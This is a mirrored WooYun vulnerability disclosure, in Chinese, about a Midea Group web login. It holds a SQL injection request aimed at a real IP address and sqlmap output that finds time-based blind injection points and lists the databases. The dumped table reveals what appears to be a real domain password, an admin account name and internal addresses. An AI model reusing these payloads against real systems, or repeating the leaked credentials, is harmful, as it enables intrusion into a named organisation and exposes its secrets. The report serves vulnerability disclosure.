乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-05-17: 厂商已经主动忽略漏洞,细节向公众公开
美的集团某服务存在漏洞泄露域信息
POST /manager/login.php?action=login HTTP/1.1Content-Length: 105Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://202.104.30.186:80/Cookie: PHPSESSID=g0mcm46780qfs2ac6cdeou0rl6Host: 202.104.30.186Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*admin%5bname%5d=-1'%20OR%203*2*1%3d6%20AND%20000129%3d000129%20--%20&admin%5bpassword%5d=g00dPa%24%24w0rD
[*] starting at 00:57:18[00:57:18] [INFO] parsing HTTP request from '1'custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y[00:57:22] [INFO] resuming back-end DBMS 'mysql' [00:57:22] [INFO] testing connection to the target URL[00:57:22] [INFO] heuristics detected web page charset 'utf-8'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #2* Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: admin[name]=-1' OR 32 AND SLEEP(5)-- ZOyO1=6 AND 000129=000129 -- &admin[password]=g00dPa$$w0rDPlace: (custom) POSTParameter: #1* Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: admin[name]=-1' OR 3 AND SLEEP(5)-- KyjK21=6 AND 000129=000129 -- &admin[password]=g00dPa$$w0rD---there were multiple injection points, please select the one to use for following injections:[0] place: (custom) POST, parameter: #1*, type: Unescaped numeric (default)[1] place: (custom) POST, parameter: #2*, type: Unescaped numeric[q] Quit> 1[00:57:25] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.3.1, Apache 2.2.14back-end DBMS: MySQL 5.0.11[00:57:25] [INFO] fetching database names[00:57:25] [INFO] fetching number of databases[00:57:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[00:57:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 4[00:57:39] [INFO] retrieved: [00:57:49] [INFO] adjusting time delay to 1 second due to good response timesinformation_schema[00:59:24] [INFO] retrieved: mysql[00:59:53] [INFO] retrieved: per[01:00:16] [ERROR] invalid character detected. retrying..[01:00:16] [WARNING] increasing time delay to 2 seconds formance_schema[01:02:30] [INFO] retrieved: unnooavailable databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] unnoo
域信息泄露
+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+| id | path | log_ip | user_deep | domain_ip | domain_name | create_type | domain_password | domain_admin_name |+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+| 9 | \\\\172.16.15.130\\123 | 202.104.30.186 | 2 | 10.16.15.240 | midea.com.cn | 2 | zv7LW4 | mxpt_bind |+----+------------------------+----------------+-----------+--------------+--------------+-------------+-----------------+-------------------+
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)